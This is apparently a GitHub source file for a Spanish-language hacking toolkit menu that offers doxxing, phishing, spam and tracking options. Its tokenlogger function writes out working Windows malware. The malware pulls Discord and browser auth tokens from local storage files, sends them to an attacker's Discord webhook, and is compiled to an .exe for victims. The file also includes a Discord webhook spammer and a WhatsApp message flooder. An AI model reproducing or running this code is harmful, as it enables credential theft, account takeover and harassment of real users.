-
Notifications
You must be signed in to change notification settings - Fork 9
/
fuckyou.py
411 lines (380 loc) · 20 KB
/
fuckyou.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
from colorama import Fore
import os
import shutil
import time
import requests
import random
import platform
import keyboard
import webbrowser
from core import doxxing, goldenphish, ser, scanner
local_version = "1.0.1"
def clear():
if os.name == "nt":
os.system("cls")
else:
os.system("clear")
def spam():
clear()
print(f"""{Fore.GREEN}
██╗ ██╗███████╗██████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗ ███████╗██████╗ █████╗ ███╗ ███╗
██║ ██║██╔════╝██╔══██╗██║ ██║██╔═══██╗██╔═══██╗██║ ██╔╝ ██╔════╝██╔══██╗██╔══██╗████╗ ████║
██║ █╗ ██║█████╗ ██████╔╝███████║██║ ██║██║ ██║█████╔╝ ███████╗██████╔╝███████║██╔████╔██║
██║███╗██║██╔══╝ ██╔══██╗██╔══██║██║ ██║██║ ██║██╔═██╗ ╚════██║██╔═══╝ ██╔══██║██║╚██╔╝██║
╚███╔███╔╝███████╗██████╔╝██║ ██║╚██████╔╝╚██████╔╝██║ ██╗ ███████║██║ ██║ ██║██║ ╚═╝ ██║
╚══╝╚══╝ ╚══════╝╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝
""")
try:
webhook = input('\n[+] Ingresa el link de la webhook: ')
mensaje = input('[+] Ingresa el mensaje que quieres enviar en la webhook: ')
while True:
requests.post(webhook, json={'username': 'Spammer', 'content': mensaje})
print('\n[~] Enviando mensaje...')
except KeyboardInterrupt:
print('\n[~] Deteniendo spam...')
time.sleep(1)
menu()
def tools():
clear()
print(f"""{Fore.BLUE}
███ ▄██████▄ ▄██████▄ ▄█ ▄████████
▀█████████▄ ███ ███ ███ ███ ███ ███ ███
▀███▀▀██ ███ ███ ███ ███ ███ ███ █▀
███ ▀ ███ ███ ███ ███ ███ ███
███ ███ ███ ███ ███ ███ ▀███████████
███ ███ ███ ███ ███ ███ ███
███ ███ ███ ███ ███ ███▌ ▄ ▄█ ███
▄████▀ ▀██████▀ ▀██████▀ █████▄▄██ ▄████████▀
▀
|------------------------------------------------------------------------------------------|
| |
| [1] Doxxing Tools |
| [2] Phishing Tools |
| [00] Regresar al menu principal |
| [99] Salir |
|------------------------------------------------------------------------------------------|
""")
a = input('\nroot@fuckyou:~# ')
if a == "1":
doxxing.doxxer()
elif a == "2":
goldenphish.phish()
elif a == "00":
menu()
elif a == "99":
exit()
else:
print(f'\n{Fore.RED}[!] Error opcion invalida.')
time.sleep(2)
tools()
def creds():
clear()
print(f'''{Fore.MAGENTA}
______ _ _ __ __ _
| ___/\| |/\ | | \ \ / / | |
| |_ \ ` ' / ___| | __ \ V /___ _ _| |
| _||_ _/ __| |/ / \ // _ \| | | | |
| | / , . \ (__| < | | (_) | |_| |_|
\_| \/|_|\/\___|_|\_\ \_/\___/ \__,_(_)
-------------------------------------------------|
| | CREDITOS | |
| |---------------| |
| |
| [~] Fuck You hecho por: |
| |
| [$] Spyk3r |
| Discord: |
| ! Spyk3r#0614 |
| Twitter: |
| https://twitter.com/_Spyk33r_ |
| Github: |
| https://github.com/Spyk3r |
| |
| [$] Euronymou5 |
| Discord: |
| Euronymou5#3155 |
| Twitter: |
| https://twitter.com/Euronymou51 |
| Github: |
| https://github.com/Euronymou5 |
|------------------------------------------------|
''')
input('\n[~] Presiona enter para continuar...')
menu()
def tracker():
if os.name == "nt":
os.system("python track/omega.py")
else:
os.system("python3 track/omega.py")
def waspam():
clear()
print(f"""{Fore.MAGENTA}
__ ___ _ _
\ \ / / | | | /\ | |
\ \ /\ / /| |__ __ _| |_ ___ / \ _ __ _ __ _ __ _ _| | _____ _ __
\ \/ \/ / | '_ \ / _` | __/ __/ / /\ \ | '_ \| '_ \ | '_ \| | | | |/ / _ \ '__|
\ /\ / | | | | (_| | |_\__ \/ ____ \| |_) | |_) | | | | | |_| | < __/ |
\/ \/ |_| |_|\__,_|\__|___/_/ \_\ .__/| .__/ |_| |_|\__,_|_|\_\___|_|
| | | |
|_| |_|
""")
print('\n[~] Abriendo whatsapp...')
webbrowser.open_new_tab('https://web.whatsapp.com/')
input(f'\n{Fore.YELLOW}[~] Una vez dentro de whatsapp web, escanea el codigo qr y pulsa enter...')
mensaje = input(f'\n{Fore.BLUE}[~] Ingresa el mensaje que quieres enviar: ')
if mensaje == "" or mensaje == " ":
print(f'\n{Fore.RED}[!] Error debes de ingresar un mensaje.')
time.sleep(3)
waspam()
else:
cantidad = int(input(f'\n{Fore.BLUE}[~] Ingresa la cantidad de mensajes que quieres enviar: '))
if cantidad == 0:
print(f'\n{Fore.RED}[!] Error debes de ingresar una cantidad.')
time.sleep(3)
waspam()
elif cantidad <= 0:
print(f'\n{Fore.RED}[!] Error debes de ingresar una cantidad correcta.')
time.sleep(3)
waspam()
else:
print('\n[~] El mensaje se enviara en 5 segundos, recuerda entrar al chat que quieres nukear...')
time.sleep(5)
for _ in range(cantidad):
print('\n[~] Enviando mensaje...')
keyboard.write(mensaje)
keyboard.press_and_release('enter')
menu()
def tokenlogger():
clear()
print(f"""{Fore.LIGHTBLUE_EX}
████████ ██████ ██ ██ ███████ ███ ██ ██ ██████ ██████ ██████ ███████ ██████
██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ █████ █████ ██ ██ ██ ██ ██ ██ ██ ███ ██ ███ █████ ██████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
██ ██████ ██ ██ ███████ ██ ████ ███████ ██████ ██████ ██████ ███████ ██ ██
""")
if os.path.isfile('logger.py'):
os.remove('logger.py')
else:
pass
variable_hook = input(f'\n{Fore.GREEN}[~] Ingresa Tu WebHook de discord: ')
f = open('logger.py', 'w')
f.write('''import os
if os.name != "nt":
exit()
import os
import re
import json
from urllib.request import Request, urlopen
WEBHOOK = 'webnook'
PING_ME = True
def find_tokens(path):
path += '\\Local Storage\\leveldb'
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
continue
for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
for token in re.findall(regex, line):
tokens.append(token)
return tokens
def main():
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
paths = {
'Discord': roaming + r'\\Discord',
'Discord Canary': roaming + r'\\discordcanary',
'Discord PTB': roaming + r'\\discordptb',
'Google Chrome': local + r'\\Google\\Chrome\\User Data\\Default',
'Opera': roaming + r'\\Opera Software\\Opera Stable',
'Brave': local + r'\\BraveSoftware\\Brave-Browser\\User Data\\Default',
'Yandex': local + r'\\Yandex\\YandexBrowser\\User Data\\Default'
}
message = '@everyone' if PING_ME else ''
for platform, path in paths.items():
if not os.path.exists(path):
continue
message += f'\n**{platform}**\n```\n'
tokens = find_tokens(path)
if len(tokens) > 0:
for token in tokens:
message += f'{token}\n'
else:
message += 'No tokens found.\n'
message += '```'
headers = {
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'
}
payload = json.dumps({'content': message})
try:
req = Request(WEBHOOK, data=payload.encode(), headers=headers)
urlopen(req)
except:
pass
if __name__ == '__main__':
main()'''.replace("webnook", variable_hook))
f.close()
print(f'\n{Fore.YELLOW}[~] Compilando token logger...')
time.sleep(2)
print(f'\n{Fore.YELLOW}[~] Detectando os...')
if platform.system() == "Linux":
print(
f'\n{Fore.RED}[✘] No es posible compilar un .exe para linux abortando...'
)
time.sleep(2)
menu()
elif platform.system() == "Darwin":
print(
f'\n{Fore.RED}[✘] No es posible compilar un .exe para MAC OS abortando...'
)
time.sleep(2)
menu()
elif platform.system() == "Windows":
print(f'\n[✔] OS Detectado: Windows')
ques = input('\n[?] Quieres agregar un icono a tu .exe? [Y/n]: ')
if ques == "Y" or ques == "y":
print('\n[~] Ejemplo: C:\\Users\\Desktop\\icon.ico')
icon = input('\n[~] Ingresa la ubicacion de tu archivo .ico: ')
if len(icon) == 0:
print(f'\n{Fore.RED}[✘] Error debes ingresar una ubicacion.')
time.sleep(2)
menu()
else:
os.system(f'pyinstaller --onefile --icon="{icon}" logger.py')
print(
f'\n{Fore.GREEN}[✔] Token logger compilado exitosamente.')
os.remove("logger.spec")
shutil.rmtree('build')
shutil.move("dist/logger.exe", "output")
shutil.rmtree('dist')
print(f'{Fore.GREEN}\n[~] Token logger movido a la carpeta: output/logger.exe')
time.sleep(3)
menu()
elif ques == "N" or ques == "n":
print('\n[~] Convirtiendo token logger a exe...')
os.system("pyinstaller -y -F logger.py")
print(f'\n{Fore.GREEN}[✔] Token logger compilado exitosamente.')
time.sleep(5)
os.remove("logger.spec")
shutil.rmtree('build')
shutil.move("dist/logger.exe", "output")
shutil.rmtree('dist')
print(f'{Fore.GREEN}\n[~] Token logger movido a la carpeta: output/logger.exe')
time.sleep(3)
menu()
else:
print(f'{Fore.RED}[✘] Error opcion invalida.')
time.sleep(2)
menu()
else:
print(f'{Fore.RED}[!] Error OS desconocido.')
time.sleep(2)
menu()
def gen():
clear()
print(f"""{Fore.LIGHTCYAN_EX}
....................../´¯/)
....................,/¯../
.................../..../
............./´¯/'...'/´¯¯`·¸
........../'/.../..../......./¨¯\\
........('(...´...´.... ¯~/'...')
.........\.................'...../
..........''...\.......... _.·´
............\..............(
..............\.............\...
""")
tam = int(input(f'\n{Fore.YELLOW}[~] Ingresa la longitud de la contraseña (Maximo 77): '))
if tam == 77:
print(f'\n{Fore.RED}[!] Error la contraseña solo puede tener una longitud menos de 77.')
time.sleep(3)
gen()
elif tam <= 77:
caracter = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ&*(){}[]/\?!@#$abcdefghijklmnopqrstuvwxyz"
contra = "".join(random.sample(caracter, tam))
print(f'\n{Fore.GREEN}[~] Contraseña generada: {contra}')
input(f'\n{Fore.LIGHTCYAN_EX}[~] Presiona enter para continuar...')
menu()
elif tam >= 77:
print(f'\n{Fore.RED}[!] Error la contraseña solo puede tener una longitud menos de 77.')
time.sleep(3)
gen()
def menu():
clear()
print(f'''{Fore.LIGHTCYAN_EX}
______ _ _ __ __ _
| ___/\| |/\ | | \ \ / / | |
| |_ \ ` ' / ___| | __ \ V /___ _ _| |
| _||_ _/ __| |/ / \ // _ \| | | | |
| | / , . \ (__| < | | (_) | |_| |_|
\_| \/|_|\/\___|_|\_\ \_/\___/ \__,_(_)
v1.0.1 by: Euronymou5 and Spyk3r{Fore.LIGHTBLUE_EX}
|-----------------------------------------------------------------------------------------------------------------|
| | MENU | |
| |---------------| |
| |
|________________$$$$$ [1] Token Logger Creator discord |
|______________$$____$$ [2] IP Tracker |
|______________$$____$$ [3] WebHook Spam Discord |
|______________$$____$$ [4] Tools Installer |
|______________$$____$$ [5] User Searcher |
|______________$$____$$ [6] Scanner Con Nmap |
|__________$$$$$$____$$$$$$ [7] Generar Contraseñas |
|________$$____$$____$$____$$$$ [8] WhatsApp Nuker |
|________$$____$$____$$____$$__$$ [00] Creditos |
|$$$$$$__$$____$$____$$____$$____$$ [98] Update Checker |
|$$____$$$$________________$$____$$ [99] Salir |
|$$______$$______________________$$ |
|__$$____$$______________________$$ |
|___$$$__$$______________________$$ |
|____$$__________________________$$ |
|_____$$$________________________$$ |
|______$$______________________$$$ |
|_______$$$____________________$$ |
|________$$____________________$$ |
|_________$$$________________$$$ |
|__________$$________________$$ |
|__________$$$$$$$$$$$$$$$$$$$$ |
|-----------------------------------------------------------------------------------------------------------------|
''')
prompt = input(f'\n{Fore.RESET}root@fuckyou:~# ')
if prompt == "1":
tokenlogger()
elif prompt == "2":
tracker()
elif prompt == "3":
spam()
elif prompt == "4":
tools()
elif prompt == "5":
ser.ser_menu()
elif prompt == "6":
scanner.scan()
elif prompt == "7":
gen()
elif prompt == "8":
waspam()
elif prompt == "00":
creds()
elif prompt == "98":
version = requests.get('https://github.com/Euronymou5/FuckYou/raw/main/version.txt')
if version.status_code == 200:
c = version.text
ola = c.strip()
if local_version == ola:
print(f'\n{Fore.GREEN}[~] No hay versiones disponibles.')
input(f'\n{Fore.LIGHTCYAN_EX}[~] Presiona enter para continuar...')
menu()
else:
print(f'\n{Fore.GREEN}[~] Una nueva version hay disponible: {ola}')
m = input(f'\n{Fore.LIGHTCYAN_EX}[~] Presiona enter para continuar...')
menu()
elif prompt == "99":
exit()
else:
print(f'\n{Fore.RED}[!] Error opcion invalida.')
time.sleep(2)
menu()
menu()